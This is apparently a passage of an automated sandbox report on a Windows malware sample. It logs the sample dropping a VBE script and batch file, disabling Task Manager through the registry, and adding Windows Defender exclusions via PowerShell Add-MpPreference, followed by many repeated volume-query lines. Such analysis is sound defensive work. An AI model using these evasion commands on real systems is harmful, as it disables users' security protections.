                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe'
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe"
                        Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe"
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe "C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe"
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0028F654 cpuid 0_2_0028F654
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_0028AF0F
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Queries volume information: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
